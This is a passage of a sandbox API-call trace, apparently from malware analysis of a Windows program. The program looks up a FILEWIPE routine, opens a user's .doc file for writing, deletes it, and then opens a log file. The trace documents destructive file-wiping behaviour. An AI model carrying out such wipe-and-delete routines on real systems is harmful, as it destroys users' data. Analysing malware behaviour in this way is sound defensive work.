out: lpMsg=0x6ae6e4) returned 0 [0035.944] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.944] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0035.944] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.944] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.944] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0035.944] FreeLibrary (hLibModule=0x754b0000) returned 1 [0035.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0035.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0035.944] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0035.944] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0035.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0035.944] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.945] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.945] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.946] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.946] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0035.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0035.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.946] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.946] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.946] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4ae5b40, ftCreationTime.dwHighDateTime=0x1d5c11a, ftLastAccessTime.dwLowDateTime=0xaaf7b9b0, ftLastAccessTime.dwHighDateTime=0x1d5c47f, ftLastWriteTime.dwLowDateTime=0xaaf7b9b0, ftLastWriteTime.dwHighDateTime=0x1d5c47f, nFileSizeHigh=0x0, nFileSizeLow=0x2926, dwReserved0=0x0, dwReserved1=0x777648, cFileName="sm D80ZGiF.doc", cAlternateFileName="SMD80Z~1.DOC")) returned 0x7c2100 [0035.946] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0035.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0035.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0035.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.947] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.947] CharLowerBuffW (in: lpsz="byte[10534]", cchLength=0xb | out: lpsz="byte[10534]") returned 0xb [0035.947] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.947] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0035.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.947] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.947] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0035.947] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0035.947] FreeLibrary (hLibModule=0x76b40000) returned 1 [0035.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0035.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0035.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0035.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0035.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0035.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0035.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0035.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0035.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0035.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0035.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0035.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0035.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0035.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0035.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0035.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0035.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0035.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0035.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.948] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.948] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.948] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.948] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0035.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0035.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.948] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.948] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0035.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.949] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0035.949] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.949] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\sm d80zgif.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0035.950] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0035.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0035.950] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.950] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.951] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.951] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0035.951] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.951] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.951] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.951] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.951] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.951] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.951] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.951] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.951] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0035.951] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.951] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.951] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.951] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.952] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.952] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.952] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.952] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc", lpFilePart=0x0) returned 0x52 [0035.952] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4ae5b40, ftCreationTime.dwHighDateTime=0x1d5c11a, ftLastAccessTime.dwLowDateTime=0xaaf7b9b0, ftLastAccessTime.dwHighDateTime=0x1d5c47f, ftLastWriteTime.dwLowDateTime=0x1523c5e0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x2926, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="sm D80ZGiF.doc", cAlternateFileName="SMD80Z~1.DOC")) returned 0x7c2100 [0035.952] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\sm d80zgif.doc")) returned 1 [0035.953] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4ae5b40, ftCreationTime.dwHighDateTime=0x1d5c11a, ftLastAccessTime.dwLowDateTime=0xaaf7b9b0, ftLastAccessTime.dwHighDateTime=0x1d5c47f, ftLastWriteTime.dwLowDateTime=0x1523c5e0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x2926, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="sm D80ZGiF.doc", cAlternateFileName="SMD80Z~1.DOC")) returned 0 [0035.953] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0035.953] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.953] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0035.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0035.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0035.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0035.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0035.954] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0035.954] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0035.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0035.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0035.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="doc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".doc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.954] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0035.954] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0035.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0035.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0035.954] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0035.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0035.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0035.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0035.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.955] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0035.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0035.955] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.955] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.955] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0035.955] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, 